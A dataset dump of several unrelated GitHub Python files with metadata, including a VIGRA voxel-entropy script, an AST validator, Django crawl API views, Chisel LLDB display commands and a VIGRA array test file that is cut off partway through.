text stringlengths 4 1.02M | meta dict |
|---|---|
import boxm_batch;
boxm_batch.register_processes();
boxm_batch.register_datatypes();
class dbvalue:
def __init__(self, index, type):
self.id = index # unsigned integer
self.type = type # string
model_dir ="/Users/isa/Experiments/CapitolBOXM_1_1_1";
print("Creating a Scene");
boxm_batch.init_process("boxmCreateSceneProcess");
boxm_batch.set_input_string(0, model_dir +"/gaussf1_scene.xml");
boxm_batch.run_process();
(scene_id, scene_type) = boxm_batch.commit_output(0);
gauss_scene = dbvalue(scene_id, scene_type);
print("*************************************");
print("Computing Entropies");
boxm_batch.init_process("boxmComputeEntropyProcess");
boxm_batch.set_input_from_db(0, gauss_scene);
boxm_batch.run_process();
(scene_id, scene_type) = boxm_batch.commit_output(0);
entropy_scene = dbvalue(scene_id, scene_type);
print("Save Scene");
boxm_batch.init_process("boxmSaveOccupancyRawProcess");
boxm_batch.set_input_from_db(0,entropy_scene);
boxm_batch.set_input_string(1, model_dir + "/entropy_scene");
boxm_batch.set_input_unsigned(2,0);
boxm_batch.set_input_unsigned(3,1);
boxm_batch.run_process();
| {
"content_hash": "7769f584ba88618a640f53a8c299ccec",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 65,
"avg_line_length": 29.05128205128205,
"alnum_prop": 0.7016769638128861,
"repo_name": "mirestrepo/voxels-at-lems",
"id": "2b3d652e120a32fa5eb463bbc462c72595eccaf1",
"size": "1133",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "boxm/compute_entropy.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1426982"
},
{
"name": "Shell",
"bytes": "360033"
},
{
"name": "TeX",
"bytes": "568"
},
{
"name": "nesC",
"bytes": "374"
}
],
"symlink_target": ""
} |
import collections
import os
import re
from pprint import pformat
from six import string_types
from simgen.utils.dict_merge import data_merge
from simgen.utils.marked_yaml import marked_load as safe_load, marked_load
#PLACEHOLDER_PATTERN = r'^\s*\{\{\s*\(?P<name>w+)\s*\}\}\s*$'
PLACEHOLDER_PATTERN = r'^\s*\{\{\s*(?P<name>\w+)\s*\}\}\s*$'
_PATTERN = re.compile(PLACEHOLDER_PATTERN)
class NodeTypeSyntaxError(Exception):
"""Raised to tell the user that there is a problem with the node type."""
def __init__(self, message, lineno=None, name=None, filename=None):
self.message = message
self.lineno = lineno
self.name = name
self.filename = filename
self.source = None
super(Exception, self).__init__(message)
def __str__(self):
# if the source is set, add the line to the output
if self.source is not None:
location = 'line %d' % self.lineno
name = self.filename or self.name
if name:
location = 'File "%s", %s' % (name, location)
lines = [self.message, ' ' + location]
try:
line = self.source.splitlines()[self.lineno - 1]
except IndexError:
line = None
if line:
lines.append(' ' + line.strip())
return u'\n'.join(lines)
else:
return self.message
class AstSyntaxError(Exception):
"""Raised to tell the user that there is a problem with the ast."""
def __init__(self, message, lineno=None, name=None, filename=None):
self.message = message
self.lineno = lineno
self.name = name
self.filename = filename
self.source = None
super(Exception, self).__init__(message)
def __str__(self):
# if the source is set, add the line to the output
if self.source is not None:
location = 'line %d' % self.lineno
name = self.filename or self.name
if name:
location = 'File "%s", %s' % (name, location)
lines = [self.message, ' ' + location]
try:
line = self.source.splitlines()[self.lineno - 1]
except IndexError:
line = None
if line:
lines.append(' ' + line.strip())
return u'\n'.join(lines)
else:
return self.message
class NodeType(object):
def __init__(self, mapping=None, file_name=None, loader=None, concept_path=[]):
assert loader is not None
self.loader = loader
self.concept_path = concept_path
if mapping:
self.file_name = file_name
self.mapping = mapping
else:
assert isinstance(file_name, string_types)
extensions = ['', '.yml', '.yaml']
fn = self.loader.find_file(file_name, self.concept_path, extensions)
if not fn:
raise IOError('Cannot find concept file {} in concept path {} (local path:{})'.format("{}[{}]".format(file_name, '|'.join(extensions)), self.concept_path, self.loader.mixed_to_local_path(self.concept_path)))
with open(fn, 'r') as f:
mapping = marked_load(f)
nodetype_name = os.path.basename(fn)
nodetype_name = nodetype_name.split('.')[0]
if 'name' in mapping:
if mapping['name'] != nodetype_name:
raise NodeTypeSyntaxError("Name attribute does not match file name: {} != {}".format(mapping['name'], nodetype_name), filename=fn)
else:
mapping['name'] = nodetype_name
self.file_name = fn
self.mapping = mapping
# sanity/syntax check
if 'name' not in self.mapping:
raise NodeTypeSyntaxError("Missing 'name' field", filename=self.mapping['file_name'])
if 'properties' not in self.mapping:
raise NodeTypeSyntaxError("Missing 'properties' field", filename=self.mapping['file_name'])
@property
def name(self):
return self.mapping['name']
@property
def properties(self):
return self.mapping['properties'].keys()
@property
def required_properties(self):
if 'required' not in self.mapping:
return []
else:
return self.mapping['required']
def default(self, p):
"""Get the default value for property p"""
return self.mapping['properties'][p]['default']
def get_property_type(self, p):
"""Get the type of property p"""
return self.mapping['properties'][p]['type']
def get_property_items_type(self, p):
"""Get the type of property p"""
if 'items' in self.mapping['properties'][p]:
return self.mapping['properties'][p]['items']
else:
return None
class AstNode(object):
def __init__(self, mapping=None, file_name=None, loader=None, code_path=[], concept_path=[], **kwargs):
assert loader is not None
self.loader = loader
self.code_path = code_path
self.concept_path = concept_path
if mapping:
self.file_name = file_name
self.mapping = mapping
else:
assert isinstance(file_name, string_types)
extensions = ['', '.yml', '.yaml']
fn = self.loader.find_file(file_name, self.code_path, extensions)
if not fn:
raise IOError('Cannot find Ast file {} in code path {} (local path:{})'.format("{}[{}]".format(file_name, '|'.join(extensions)), self.code_path, self.loader.mixed_to_local_path(self.code_path)))
with open(fn, 'r') as f:
mapping = safe_load(f)
self.file_name = fn
self.mapping = mapping
if sum(1 for _ in self.mapping.keys()) != 1:
raise AstSyntaxError('Ast node must have exactly one root element', filename=self.file_name, lineno=1)
@property
def nodetype_name(self):
# There should only ever be one key.
for key in self.mapping.keys():
return key
@property
def properties(self):
return self.mapping[self.nodetype_name].keys()
def set_property(self, n, v):
self.mapping[self.nodetype_name][n]=v
def get_property(self, n):
return self.mapping[self.nodetype_name][n]
def merge(self, dict_to_merge):
self.mapping = data_merge(self.mapping, dict_to_merge)
def is_instance(self, value, typename_list, listitem_typesnames=None):
"""Check if the type of a value matches at least one types in the typename_list."""
type_match = False
for typename in typename_list:
# check primitive types
if ((typename == 'object') or
(typename == 'integer' and isinstance(value, int)) or
(typename == 'number' and isinstance(value, (int, float))) or
(typename == 'boolean' and isinstance(value, bool)) or
(typename == 'string' and isinstance(value, string_types))
):
type_match = True
break
# check user defined types
elif isinstance(value, dict) and typename in value:
type_match = True
break
elif typename == 'list' and isinstance(value, collections.Iterable):
if not listitem_typesnames:
# untyped list
type_match = True
else:
# typed list
type_match = True
for v in value:
if not self.is_instance(v, listitem_typesnames):
type_match = False
if type_match:
break
return type_match
def validate(self):
self.nodetype = NodeType(file_name=self.nodetype_name, loader=self.loader, concept_path=self.concept_path)
# check existence of required attrs
for req_property_name in self.nodetype.required_properties:
if req_property_name not in self.properties:
raise AstSyntaxError("Ast node does not have required attribute {}".format(req_property_name), filename=self.mapping.file_name, lineno=1)
# inject defaults
for property_name in self.nodetype.properties:
if property_name not in self.properties:
self.set_property(property_name, self.nodetype.default(property_name))
# type check
for property_name in self.properties:
value = self.get_property(property_name)
# check if value is a placeholder, in the format of '{{ placeholder_name }}'
if (isinstance(value, string_types) and re.match(r'^\s*\{\{\s*\w+\s*\}\}\s*$', value, 0)):
# it's a placeholder, so don't do type checking
continue
# the allowed types (one or more) for the given parameter
typename_list = self.nodetype.get_property_type(property_name)
# if the typename_list contains a list type, listitem_typenames specify the allowed list item types
listitem_typenames = self.nodetype.get_property_items_type(property_name)
if not isinstance(typename_list, list):
typename_list = [typename_list]
if not self.is_instance(value, typename_list, listitem_typenames):
raise AstSyntaxError('Type of parameter {} is not {}, but {}'.format(property_name, typename_list, type(value)), filename=self.file_name, lineno=property_name.start_mark.line)
# recurse
for property_name in self.properties:
# recurse if it's a dict
if isinstance(self.get_property(property_name), dict):
ast = AstNode(mapping=self.get_property(property_name), loader=self.loader, code_path=self.code_path, concept_path=self.concept_path, file_name=self.file_name)
ast.validate()
# recurs if it's a list containing dists
if isinstance(self.get_property(property_name), collections.Iterable):
for list_item in self.get_property(property_name):
if isinstance(list_item, dict):
ast = AstNode(mapping=list_item, loader=self.loader, code_path=self.code_path, concept_path=self.concept_path, file_name=self.file_name)
ast.validate()
return True
def inject(self, mapping):
# type check
for property_name in self.properties:
value = self.get_property(property_name)
# check if value is a placeholder, in the format of '{{ placeholder_name }}'
if isinstance(value, string_types):
result = _PATTERN.match(value)
if result:
# it's a placeholder
name = result.group('name')
# replace placeholder with
if name in mapping:
self.set_property(property_name, mapping[name])
# recurse if value is a dict
if isinstance(value, dict):
ast = AstNode(mapping=value, loader=self.loader, code_path=self.code_path, concept_path=self.concept_path, file_name=self.file_name)
ast.inject(mapping)
# if the value is a list, try recursing into the items
if isinstance(value, collections.Iterable):
for list_item in value:
if isinstance(list_item, dict):
ast = AstNode(mapping=list_item, loader=self.loader, code_path=self.code_path, concept_path=self.concept_path, file_name=self.file_name)
ast.inject(mapping)
def __repr__(self):
return "AstNode(nodetype.name={}, ast={})".format(self.nodetype_name, pformat(self.mapping))
| {
"content_hash": "b333b1cfb50aa28f1d0634bcefcc33d6",
"timestamp": "",
"source": "github",
"line_count": 315,
"max_line_length": 223,
"avg_line_length": 39.231746031746034,
"alnum_prop": 0.5547014079948211,
"repo_name": "iModels/simgen",
"id": "0ca07daec7d654d0fef0f7e93524663501c999e3",
"size": "12358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simgen/astnode.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2030"
},
{
"name": "HTML",
"bytes": "6713"
},
{
"name": "JavaScript",
"bytes": "2025"
},
{
"name": "Jupyter Notebook",
"bytes": "1905"
},
{
"name": "PowerShell",
"bytes": "3113"
},
{
"name": "Python",
"bytes": "56348"
},
{
"name": "Shell",
"bytes": "1952"
}
],
"symlink_target": ""
} |
from django.http import HttpResponse
from django.core.paginator import Paginator
from django.views.decorators.csrf import csrf_exempt
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from crawl.models import Crawl, PageReference
from crawl.serializers import CrawlSerializer, PageReferenceSerializer
class JSONResponse(HttpResponse):
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
@csrf_exempt
def crawl_list(request):
if request.method == 'GET':
crawl = Crawl.objects.all()
serializer = CrawlSerializer(crawl, many=True)
return JSONResponse(serializer.data)
elif request.method == 'POST':
data = JSONParser().parse(request)
serializer = CrawlSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data, status=201)
return JSONResponse(serializer.errors, status=400)
@csrf_exempt
def crawl_detail(request, pk):
try:
crawl = Crawl.objects.get(pk=pk)
except Crawl.DoesNotExist:
return HttpResponse(status=404)
if request.method == 'GET':
serializer = CrawlSerializer(crawl)
return JSONResponse(serializer.data)
elif request.method == 'PUT':
data = JSONParser().parse(request)
serializer = CrawlSerializer(crawl, data=data)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data)
return JSONResponse(serializer.errors, status=404)
elif request.method == 'DELETE':
crawl.delete()
return HttpResponse(status=204)
@csrf_exempt
def page_reference(request):
if request.method == 'GET':
page = PageReference.objects.all()
p = Paginator(page, 10)
serializer = PageReferenceSerializer(p.page(1), many=True)
response = JSONResponse(serializer.data)
response['Access-Control-Allow-Origin'] = '*'
return response
| {
"content_hash": "d12b3bc75b3ba25c52853d48ba7e6e53",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 70,
"avg_line_length": 34.5,
"alnum_prop": 0.6774193548387096,
"repo_name": "ethan-lau/mars",
"id": "84b4fe55e82984a9c7151fcd114efa4b996d33cc",
"size": "2139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web_module/crawl/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "570"
},
{
"name": "HTML",
"bytes": "1277"
},
{
"name": "JavaScript",
"bytes": "6854"
},
{
"name": "Python",
"bytes": "20761"
},
{
"name": "Shell",
"bytes": "109"
}
],
"symlink_target": ""
} |
import fbchisellldbbase as fb
import fbchisellldbobjcruntimehelpers as runtimeHelpers
import fbchisellldbviewcontrollerhelpers as viewControllerHelpers
import fbchisellldbviewhelpers as viewHelpers
import lldb
def lldbcommands():
return [
FBCoreAnimationFlushCommand(),
FBDrawBorderCommand(),
FBRemoveBorderCommand(),
FBMaskViewCommand(),
FBUnmaskViewCommand(),
FBShowViewCommand(),
FBHideViewCommand(),
FBPresentViewControllerCommand(),
FBDismissViewControllerCommand(),
FBSlowAnimationCommand(),
FBUnslowAnimationCommand(),
]
class FBDrawBorderCommand(fb.FBCommand):
colors = [
"black",
"gray",
"red",
"green",
"blue",
"cyan",
"yellow",
"magenta",
"orange",
"purple",
"brown",
]
def name(self):
return "border"
def description(self):
return "Draws a border around <viewOrLayer>. Color and width can be optionally provided. Additionally depth can be provided in order to recursively border subviews."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to border. NSViews must be layer-backed.",
)
]
def options(self):
return [
fb.FBCommandArgument(
short="-c",
long="--color",
arg="color",
type="string",
default="red",
help="A color name such as 'red', 'green', 'magenta', etc.",
),
fb.FBCommandArgument(
short="-w",
long="--width",
arg="width",
type="CGFloat",
default=2.0,
help="Desired width of border.",
),
fb.FBCommandArgument(
short="-d",
long="--depth",
arg="depth",
type="int",
default=0,
help="Number of levels of subviews to border. Each level gets a different color beginning with the provided or default color",
),
]
def run(self, args, options):
def setBorder(layer, width, color, colorClass):
fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, width))
fb.evaluateEffect(
"[%s setBorderColor:(CGColorRef)[(id)[%s %sColor] CGColor]]"
% (layer, colorClass, color)
)
obj = fb.evaluateInputExpression(args[0])
depth = int(options.depth)
isMac = runtimeHelpers.isMacintoshArch()
color = options.color
assert color in self.colors, "Color must be one of the following: {}".format(
" ".join(self.colors)
)
colorClassName = "UIColor"
if isMac:
colorClassName = "NSColor"
if viewHelpers.isView(obj):
prevLevel = 0
for view, level in viewHelpers.subviewsOfView(obj):
if level > depth:
break
if prevLevel != level:
color = self.nextColorAfterColor(color)
prevLevel = level
layer = viewHelpers.convertToLayer(view)
setBorder(layer, options.width, color, colorClassName)
else:
# `obj` is not a view, make sure recursive bordering is not requested
assert (
depth <= 0
), "Recursive bordering is only supported for UIViews or NSViews"
layer = viewHelpers.convertToLayer(obj)
setBorder(layer, options.width, color, colorClassName)
lldb.debugger.HandleCommand("caflush")
def nextColorAfterColor(self, color):
assert color in self.colors, "{} is not a supported color".format(color)
return self.colors[(self.colors.index(color) + 1) % len(self.colors)]
class FBRemoveBorderCommand(fb.FBCommand):
def name(self):
return "unborder"
def description(self):
return "Removes border around <viewOrLayer>."
def options(self):
return [
fb.FBCommandArgument(
short="-d",
long="--depth",
arg="depth",
type="int",
default=0,
help="Number of levels of subviews to unborder.",
)
]
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to unborder.",
)
]
def run(self, args, options):
def setUnborder(layer):
fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, 0))
obj = args[0]
depth = int(options.depth)
if viewHelpers.isView(obj):
for view, level in viewHelpers.subviewsOfView(obj):
if level > depth:
break
layer = viewHelpers.convertToLayer(view)
setUnborder(layer)
else:
# `obj` is not a view, make sure recursive unbordering is not requested
assert (
depth <= 0
), "Recursive unbordering is only supported for UIViews or NSViews"
layer = viewHelpers.convertToLayer(obj)
setUnborder(layer)
lldb.debugger.HandleCommand("caflush")
class FBMaskViewCommand(fb.FBCommand):
def name(self):
return "mask"
def description(self):
return "Add a transparent rectangle to the window to reveal a possibly obscured or hidden view or layer's bounds"
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to mask.",
)
]
def options(self):
return [
fb.FBCommandArgument(
short="-c",
long="--color",
arg="color",
type="string",
default="red",
help="A color name such as 'red', 'green', 'magenta', etc.",
),
fb.FBCommandArgument(
short="-a",
long="--alpha",
arg="alpha",
type="CGFloat",
default=0.5,
help="Desired alpha of mask.",
),
]
def run(self, args, options):
viewOrLayer = fb.evaluateObjectExpression(args[0])
viewHelpers.maskView(viewOrLayer, options.color, options.alpha)
class FBUnmaskViewCommand(fb.FBCommand):
def name(self):
return "unmask"
def description(self):
return "Remove mask from a view or layer"
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/CALayer *",
help="The view/layer to mask.",
)
]
def run(self, args, options):
viewOrLayer = fb.evaluateObjectExpression(args[0])
viewHelpers.unmaskView(viewOrLayer)
class FBCoreAnimationFlushCommand(fb.FBCommand):
def name(self):
return "caflush"
def description(self):
return "Force Core Animation to flush. This will 'repaint' the UI but also may mess with ongoing animations."
def run(self, arguments, options):
viewHelpers.flushCoreAnimationTransaction()
class FBShowViewCommand(fb.FBCommand):
def name(self):
return "show"
def description(self):
return "Show a view or layer."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to show.",
)
]
def run(self, args, options):
viewHelpers.setViewHidden(args[0], False)
class FBHideViewCommand(fb.FBCommand):
def name(self):
return "hide"
def description(self):
return "Hide a view or layer."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to hide.",
)
]
def run(self, args, options):
viewHelpers.setViewHidden(args[0], True)
class FBPresentViewControllerCommand(fb.FBCommand):
def name(self):
return "present"
def description(self):
return "Present a view controller."
def args(self):
return [
fb.FBCommandArgument(
arg="viewController",
type="UIViewController *",
help="The view controller to present.",
)
]
def run(self, args, option):
viewControllerHelpers.presentViewController(args[0])
class FBDismissViewControllerCommand(fb.FBCommand):
def name(self):
return "dismiss"
def description(self):
return "Dismiss a presented view controller."
def args(self):
return [
fb.FBCommandArgument(
arg="viewController",
type="UIViewController *",
help="The view controller to dismiss.",
)
]
def run(self, args, option):
viewControllerHelpers.dismissViewController(args[0])
class FBSlowAnimationCommand(fb.FBCommand):
def name(self):
return "slowanim"
def description(self):
return "Slows down animations. Works on the iOS Simulator and a device."
def args(self):
return [
fb.FBCommandArgument(
arg="speed",
type="float",
default=0.1,
help="Animation speed (default 0.1).",
)
]
def run(self, args, option):
viewHelpers.slowAnimation(args[0])
class FBUnslowAnimationCommand(fb.FBCommand):
def name(self):
return "unslowanim"
def description(self):
return "Turn off slow animations."
def run(self, args, option):
viewHelpers.slowAnimation()
| {
"content_hash": "025cb1356de1aa1e3175649f69776ee5",
"timestamp": "",
"source": "github",
"line_count": 359,
"max_line_length": 173,
"avg_line_length": 28.779944289693592,
"alnum_prop": 0.5429732868757259,
"repo_name": "facebook/chisel",
"id": "5902ba95e3b1511c47795154cd6cb051e4d2d03d",
"size": "10549",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "commands/FBDisplayCommands.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1962"
},
{
"name": "C++",
"bytes": "1876"
},
{
"name": "Makefile",
"bytes": "321"
},
{
"name": "Objective-C",
"bytes": "5139"
},
{
"name": "Objective-C++",
"bytes": "11455"
},
{
"name": "Python",
"bytes": "208307"
}
],
"symlink_target": ""
} |
#######################################################################
#
# Copyright 2009-2010 by Ullrich Koethe
#
# This file is part of the VIGRA computer vision library.
# The VIGRA Website is
# http://hci.iwr.uni-heidelberg.de/vigra/
# Please direct questions, bug reports, and contributions to
# ullrich.koethe@iwr.uni-heidelberg.de or
# vigra@informatik.uni-hamburg.de
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
#######################################################################
# run with a simple 'nosetests' in this directory
# (and nose installed, i.e. 'easy_install nose')
from __future__ import division, print_function
from functools import reduce
import sys
print("\nexecuting test file", __file__, file=sys.stderr)
exec(compile(open('set_paths.py', "rb").read(), 'set_paths.py', 'exec'))
# import vigra # FIXME: without this line, C++ constructors don't find VigraArray
import vigra.arraytypes as arraytypes
import vigra.ufunc as ufunc
import numpy, copy
import vigranumpytest as vt
from nose.tools import assert_equal, raises, assert_true
from vigra.arraytypes import AxisTags, AxisInfo
if sys.version_info[0] > 2:
def xrange(*args):
return range(*args)
def iteritems(dictionary, **kwargs):
return dictionary.items(**kwargs)
else:
def iteritems(dictionary, **kwargs):
return dictionary.iteritems(**kwargs)
numpyHasComplexNegateBug = numpy.version.version.startswith('1.0')
try:
vt.testAny()
except Exception as e:
ArgumentError = type(e)
allTests = set()
for n, f in vt.__dict__.items():
if n.startswith('test'):
allTests.add(n)
def checkShape(shape1, shape2):
assert_equal(shape1, shape2)
def checkStride(stride1, stride2):
assert_equal(stride1, stride2)
def computeFStrides(shape):
return tuple(numpy.cumprod((1,)+shape[:-1]))
def computeCStrides(shape):
return tuple(reversed(computeFStrides(tuple(reversed(shape)))))
def computeVStrides(shape, hasChannelAxis):
if not hasChannelAxis:
return computeFStrides(shape)
stride = computeFStrides(shape[-1:] + shape[:-1])
return stride[1:] + stride[0:1]
def checkArray(cls, channels, dim, hasChannelAxis=True):
def testCopy(img):
b = cls(img, order='A')
assert_equal(sys.getrefcount(b), 2)
assert b.__class__ is img.__class__
assert_equal(b.shape, img.shape)
assert_equal(b.strides, img.strides)
assert_equal(b.order, img.order)
assert_equal(b.flags.c_contiguous, img.flags.c_contiguous)
assert_equal(b.flags.f_contiguous, img.flags.f_contiguous)
assert (b == img).all()
assert not numpy.may_share_memory(b, img)
b = img.copy(order='A')
assert_equal(sys.getrefcount(b), 2)
assert_equal(b.shape, img.shape)
assert_equal(b.strides, img.strides)
assert_equal(b.order, img.order)
assert_equal(b.flags.c_contiguous, img.flags.c_contiguous)
assert_equal(b.flags.f_contiguous, img.flags.f_contiguous)
assert (b == img).all()
assert not numpy.may_share_memory(b, img)
shape = (channels, 5, 10, 20)
axistags = [AxisInfo.c, AxisInfo.x, AxisInfo.y, AxisInfo.z]
axistags3 = AxisTags(AxisInfo.y, AxisInfo.z, AxisInfo.x)
axistags4 = AxisTags(AxisInfo.y, AxisInfo.z, AxisInfo.x, AxisInfo.c)
axistags5 = AxisTags(AxisInfo.c, AxisInfo.x, AxisInfo.y, AxisInfo.z, AxisInfo.t)
# figure out expected strides and axistags
s = 0 if hasChannelAxis else 1
d = dim + 1
fshape = shape[s:d]
fstrides = computeFStrides(fshape)
faxistags = AxisTags(axistags[s:d])
cshape = tuple(reversed(fshape))
cstrides = computeCStrides(cshape)
caxistags = AxisTags(list(reversed(faxistags)))
vshape = fshape[1-s:d] + fshape[:1-s]
vstrides = computeVStrides(vshape, hasChannelAxis)
vaxistags = AxisTags(axistags[1:d] + axistags[:1-s])
fcstrides = tuple([k*4 for k in cstrides])
fvstrides = tuple([k*4 for k in vstrides])
ffstrides = tuple([k*4 for k in fstrides])
value = 1 if channels == 1 else range(1,channels+1)
# test type
img = cls(vshape, order="V")
# assert type(img) is cls
assert isinstance(img, numpy.ndarray)
assert_equal(img.dtype, numpy.float32)
assert_equal(sys.getrefcount(img), 2)
# test shape
checkShape(img.shape, vshape)
assert_equal(img.width, vshape[0])
assert_equal(img.height, vshape[1])
if dim == 3:
assert_equal(img.depth, vshape[2])
assert_equal(img.channels, channels)
assert_equal(img.spatialDimensions, dim)
# test strides and order
checkStride(img.strides, fvstrides)
if channels > 1:
assert_equal(img.order, "V" if hasChannelAxis else "F")
else:
assert_true(img.order in ['V', 'F'])
assert_equal(img.flags.c_contiguous, False)
# test axistags
assert_equal(img.axistags, vaxistags)
assert_equal(img.view5D('F').axistags, axistags5)
assert_equal(img.withAxes('y', 'z', 'x', 'c').axistags, axistags4)
assert_equal(img.withAxes('yzxc').axistags, axistags4)
assert_equal(img.withAxes(axistags4).axistags, axistags4)
assert_true(img.withAxes(img.axistags) is img)
array = img.noTags()
assert_equal(type(array), numpy.ndarray)
assert_equal(arraytypes.taggedView(array, vaxistags).axistags, vaxistags)
assert_equal(arraytypes.taggedView(array, vaxistags.keys()).axistags, vaxistags)
assert_equal(arraytypes.taggedView(array, ''.join(vaxistags.keys())).axistags, vaxistags)
if img.channels == 1:
assert_equal(img.withAxes('y', 'z', 'x').axistags, axistags3)
else:
try:
img.withAxes('y', 'z', 'x')
raise AssertionError("img.withAxes() failed to throw on non-singleton channel.")
except RuntimeError:
pass
# FIXME: add more tests
# test initialization and assignment
assert_equal(img.min(), 0.0)
assert_equal(img.max(), 0.0)
img = cls(vshape, order="V", value=99.0)
assert_equal(img.min(), 99.0)
assert_equal(img.max(), 99.0)
img.flat[:] = range(img.size)
assert_equal(img.flatten().tolist(), list(range(img.size)))
img[1,2] = value
assert_equal((img[1,2]==value).all(), True)
# test that copy and ufuncs preserve memory layout
testCopy(img)
assert_equal(img.shape, (-img).shape)
assert_equal(img.strides, (-img).strides)
assert_equal(img.axistags, (-img).axistags)
assert_equal(img.shape, (img+img).shape)
assert_equal(img.strides, (img+img).strides)
assert_equal(img.axistags, (img+img).axistags)
assert_equal(img.shape, (img*2).shape)
assert_equal(img.strides, (img*2).strides)
assert_equal(img.axistags, (img*2).axistags)
# test shape, strides, and copy for 'F' order
img = cls(fshape, order='F')
assert_equal(sys.getrefcount(img), 2)
checkShape(img.shape, fshape)
checkStride(img.strides, ffstrides)
assert_equal(img.axistags, faxistags)
assert_equal(img.order, "F")
assert_equal(img.flags.c_contiguous, False)
assert_equal(img.flags.f_contiguous, True)
assert_equal(img.min(), 0.0)
assert_equal(img.max(), 0.0)
img = cls(fshape, order="F", value=99.0)
assert_equal(img.min(), 99.0)
assert_equal(img.max(), 99.0)
if dim == 2:
img[...,1,2] = value
else:
img[...,0,1,2] = value
testCopy(img)
assert_equal(img.strides, (-img).strides)
assert_equal(img.strides, (img+img).strides)
assert_equal(img.strides, (img*2).strides)
assert_equal(img.axistags, (-img).axistags)
assert_equal(img.axistags, (img+img).axistags)
assert_equal(img.axistags, (img*2).axistags)
assert_equal(img.view5D('F').axistags, axistags5)
assert_equal(img.withAxes('y', 'z', 'x', 'c').axistags, axistags4)
# test shape, strides, and copy for 'A' order (should be equal to 'V' order)
img = cls(vshape, order='A')
assert_equal(sys.getrefcount(img), 2)
checkShape(img.shape, vshape)
checkStride(img.strides, fvstrides)
if channels > 1:
assert_equal(img.order, "V" if hasChannelAxis else "F")
else:
assert_true(img.order in ['V', 'F'])
assert_equal(img.flags.c_contiguous, False)
assert_equal(img.axistags, vaxistags)
img[1,2] = value
testCopy(img)
assert_equal(img.strides, (-img).strides)
assert_equal(img.strides, (img+img).strides)
assert_equal(img.strides, (img*2).strides)
assert_equal(img.axistags, (-img).axistags)
assert_equal(img.axistags, (img+img).axistags)
assert_equal(img.axistags, (img*2).axistags)
# test shape, strides, and copy for 'C' order
img = cls(cshape, order='C')
assert_equal(sys.getrefcount(img), 2)
checkShape(img.shape, cshape)
checkStride(img.strides, fcstrides)
assert_equal(img.axistags, caxistags)
assert_equal(img.order, "C")
assert_equal(img.flags.c_contiguous, True)
assert_equal(img.flags.f_contiguous, False)
assert_equal(img.min(), 0.0)
assert_equal(img.max(), 0.0)
img = cls(cshape, order="C", value=99.0)
assert_equal(img.min(), 99.0)
assert_equal(img.max(), 99.0)
img[1,2] = value
testCopy(img)
assert_equal(img.strides, (-img).strides)
assert_equal(img.strides, (img+img).strides)
assert_equal(img.strides, (img*2).strides)
assert_equal(img.axistags, (-img).axistags)
assert_equal(img.axistags, (img+img).axistags)
assert_equal(img.axistags, (img*2).axistags)
assert_equal(img.view5D('F').axistags, axistags5)
assert_equal(img.withAxes('y', 'z', 'x', 'c').axistags, axistags4)
value = 10 if channels == 1 else range(10,channels+10)
zero = 0 if channels == 1 else (0,)*channels
# test shape, strides, and copy for dtype uint8
img = cls(vshape, order="V")
b = cls(img, dtype=numpy.uint8, order='V')
assert_equal(sys.getrefcount(b), 2)
assert_equal(b.dtype, numpy.uint8)
checkShape(b.shape, img.shape)
checkStride(b.strides, computeVStrides(b.shape, hasChannelAxis))
if channels > 1:
assert_equal(img.order, "V" if hasChannelAxis else "F")
else:
assert_true(img.order in ['V', 'F'])
assert_equal(b.axistags, img.axistags)
assert_equal(b.flags.c_contiguous, False)
assert (b==img).all()
b[2,1] = value
assert (b[2,1]==value).all()
assert (img[2,1]==zero).all()
assert_equal(b.strides, (-b).strides)
assert_equal(b.strides, (b+b).strides)
assert_equal(b.strides, (b*2).strides)
assert_equal(b.axistags, (-b).axistags)
assert_equal(b.axistags, (b+b).axistags)
assert_equal(b.axistags, (b*2).axistags)
img = cls(cshape, order="C")
